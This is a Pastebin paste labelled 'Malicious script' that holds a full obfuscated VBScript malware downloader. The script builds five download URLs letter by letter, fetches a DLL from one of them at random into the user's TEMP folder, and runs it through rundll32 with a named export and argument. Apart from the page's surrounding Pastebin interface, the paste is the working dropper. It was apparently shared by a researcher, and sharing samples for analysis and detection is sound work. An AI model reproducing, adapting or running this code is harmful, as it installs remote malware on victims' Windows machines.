SHARE
TWEET

Malicious script

dynamoo Oct 31st, 2016 183 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. Const BQb = 1, Ue = 2, Kn = 8
  3. Const UEs = 1, WLv9 = 2, GEw9 = "437", KYp = 2
  4. Function SDu6(BVt)
  5. Dim Qx4, Xi, SAx1
  6. Set Qx4 = CreateObject("ADODB.Stream")
  7. Qx4.type = WLv9
  8. Qx4.Charset = GEw9
  9. Qx4.Open
  10. Qx4.LoadFromFile BVt
  11. SAx1 = Qx4.ReadText
  12. Qx4.Close
  13. SDu6 = ZBd(SAx1)
  14. End Function
  15. Sub VKq4(BVt, Pg0)
  16. Dim Qx4, SAx1
  17. Set Qx4 = CreateObject("ADODB.Stream")
  18. Qx4.type = WLv9
  19. Qx4.Charset = GEw9
  20. Qx4.Open
  21. SAx1 = ALs(Pg0)
  22. Qx4.WriteText SAx1
  23. Qx4.SaveToFile BVt, KYp
  24. Qx4.Close
  25. End Sub
  26. Function Cv3(NHa0)
  27. Dim SAx1, YLy5(0)
  28. If NHa0 <= 0 Then
  29. Err.Raise 50001, "", "asdfasdf", "", 0
  30. ElseIf NHa0 = 1 Then
  31. Cv3 = YLy5
  32. Else
  33. SAx1 = Space(NHa0-1)
  34. Cv3 = Split(SAx1, " ")
  35. End If
  36. End Function
  37. Function Cl3(url)
  38. Dim DRq9, Zb9, Xi, Ox9
  39. Dim Ir7, VMo(1)
  40. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  41. VMo(0) = "WinHttp.WinHttpRequest.5.1"
  42. VMo(1) = "MSXML2.XMLHTTP"
  43. For Each Ir7 in VMo
  44. Err.Clear
  45. Set Zb9 = CreateObject(Ir7)
  46. If Err.Number = 0 Then
  47. Exit For
  48. End If
  49. Next
  50. Zb9.Open "GET", url, False
  51. Zb9.Send
  52. Xi = Cv3(LenB(Zb9.ResponseBody))
  53. For Ox9 = 1 To LenB(Zb9.ResponseBody)
  54. Xi(Ox9-1) = AscB(MidB(Zb9.ResponseBody, Ox9, 1))
  55. Next
  56. Cl3 = Xi
  57. End Function
  58. Sub DQs( It, OJm )
  59. Dim Ox9, Yp1, DRq9, Zb9, Ah9
  60. Set DRq9 = CreateObject( "Scripting.FileSystemObject" )
  61. If DRq9.FolderExists( OJm ) Then
  62. Ah9 = DRq9.BuildPath( OJm, Mid( It, InStrRev( It, "/" ) + 1 ) )
  63. ElseIf DRq9.FolderExists( Left( OJm, InStrRev( OJm, "\" ) - 1 ) ) Then
  64. Ah9 = OJm
  65. Else
  66. WScript.Echo "ERROR: Target folder not found."
  67. Exit Sub
  68. End If
  69. Set Yp1 = DRq9.OpenTextFile( Ah9, Ue, True )
  70. Set Zb9 = CreateObject( "WinHttp.WinHttpRequest.5.1" )
  71. Zb9.Open "GET", It, False
  72. Zb9.Send
  73. For Ox9 = 1 To LenB( Zb9.ResponseBody )
  74. Yp1.Write Chr( AscB( MidB( Zb9.ResponseBody, Ox9, 1 ) ) )
  75. Next
  76. Yp1.Close( )
  77. End Sub
  78. Function FSn7()
  79. Dim Lw6, Sz, ROm
  80. Set Lw6 = CreateObject("WScript.Shell")
  81. Set Sz = Lw6.Environment("System")
  82. ROm = Sz("PROCESSOR_ARCHITECTURE")
  83. If LCase(ROm) = "amd64" Then
  84. FSn7 = Lw6.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  85. Else
  86. FSn7 = Lw6.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  87. End If
  88. End Function
  89. Sub Ab(Bx0, Jn0, QRs5)
  90. Dim Lw6, DRq9, Yp1, Sd, Ib1
  91. Set Lw6 = CreateObject("WScript.Shell")
  92. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  93. Set Yp1 = DRq9.GetFile(Bx0)
  94. Sd = Yp1.ShortPath
  95. Ib1 = FSn7() + " " + Sd + "," + Jn0 + " " + QRs5
  96. If 2 > 1 Then
  97. Lw6.Run(Ib1)
  98. End If
  99. End Sub
  100. Function NMa6(Bx0)
  101. Dim DRq9
  102. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  103. NMa6 = DRq9.FileExists(Bx0)
  104. End Function
  105. Function SWu0(Bx0)
  106. Dim DRq9, Yp1
  107. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  108. Set Yp1 = DRq9.GetFile(Bx0)
  109. SWu0 = Yp1.ShortPath
  110. End Function
  111. Function TEv5(CTi, Nh0)
  112. Dim NHa0
  113. NHa0 = CDbl(Int(CDbl(CTi)/CDbl(Nh0)))
  114. TEv5 = CDbl(CTi) - NHa0 * CDbl(Nh0)
  115. End Function
  116. Function Ng(LCl0, SAx1)
  117. SAx1(1) = 172 * SAx1(1) Mod 30307
  118. SAx1(0) = 171 * SAx1(0) Mod 30269
  119. SAx1(2) = 170 * SAx1(2) Mod 30323
  120. Dim Lp3
  121. Lp3 = TEv5((CDbl(SAx1(0))/30269.0 + CDbl(SAx1(1))/30307.0 + CDbl(SAx1(2))/30323.0), 1.0)
  122. Ng = Int(Lp3 * CDbl(LCl0))
  123. End Function
  124. Function Yg0(KFe)
  125. Yg0 = CInt(KFe*Rnd())
  126. End Function
  127. Sub Jo(LQh)
  128. WScript.Sleep(LQh)
  129. End Sub
  130. Randomize
  131. Dim Je(2), AMb, BJy(4), BVt
  132. Je(0) = 1256
  133. Je(1) = 21487
  134. Je(2) = 14252
  135. AMb = 21
  136. If 1=1 Then
  137. BJy(0) = "http://" & "t" & "a" & "s" & "t" & "e" & "b" & "u" & "d" & "s" & "m" & "a" & "r" & "k" & "e" & "t" & "i" & "n" & "g" & "." & "c" & "o" & "m" & "/" & "u" & "w" & "6" & "l" & "i" & "n"
  138. End If
  139. If 1=1 Then
  140. BJy(1) = "http://" & "m" & "e" & "c" & "h" & "a" & "p" & "." & "c" & "o" & "m" & "/" & "x" & "d" & "7" & "u" & "h"
  141. End If
  142. If 1=1 Then
  143. BJy(2) = "http://" & "c" & "o" & "f" & "f" & "e" & "e" & "t" & "e" & "a" & "s" & "h" & "o" & "p" & "." & "r" & "u" & "/" & "d" & "a" & "z" & "2" & "r" & "p"
  144. End If
  145. If 1=1 Then
  146. BJy(3) = "http://" & "f" & "i" & "c" & "u" & "s" & "s" & "a" & "l" & "m" & "." & "c" & "o" & "m" & "/" & "0" & "b" & "q" & "z" & "c" & "n" & "9" & "6"
  147. End If
  148. If 1=1 Then
  149. BJy(4) = "http://" & "w" & "a" & "y" & "n" & "e" & "s" & "i" & "n" & "e" & "w" & "." & "c" & "o" & "m" & "/" & "0" & "f" & "q" & "t" & "9" & "h" & "e" & "1"
  150. End If
  151. BVt = "Tqg8ceGBV4iU4AM2"
  152. Dim Lw6, Nj, Zj, Sg5, LQh
  153. Set objShell = CreateObject("WS"&"cript.Shell")
  154. Nj = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%")
  155. Dim ODc, FOl8, JPf0, Wn9, Ox9
  156. FOl8 = False
  157. For Ox9=0 To 10: Do
  158. Zj = Nj + "\" + BVt + CStr(Ox9) + ".dll"
  159. If NMa6(Zj) Then
  160. Sg5 = SWu0(Zj) & ".txt"
  161. If NMa6(Sg5) Then
  162. WScript.Quit(0)
  163. End If
  164. End If
  165. If Not FOl8 Then
  166. ODc = Yg0(UBound(BJy))
  167. DQs BJy(ODc), Zj
  168. If Err.Number <> 0 Then
  169. Exit Do
  170. End If
  171. FOl8 = True
  172. End If
  173. Ab Zj, "E"&"n"&"hancedStoragePasswordConfig", "1"&"47"
  174. LQh = 24700
  175. Jo LQh
  176. Loop While False: Next
  177. If 3=3 Then
  178. WScript.Quit(1)
  179. End If
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top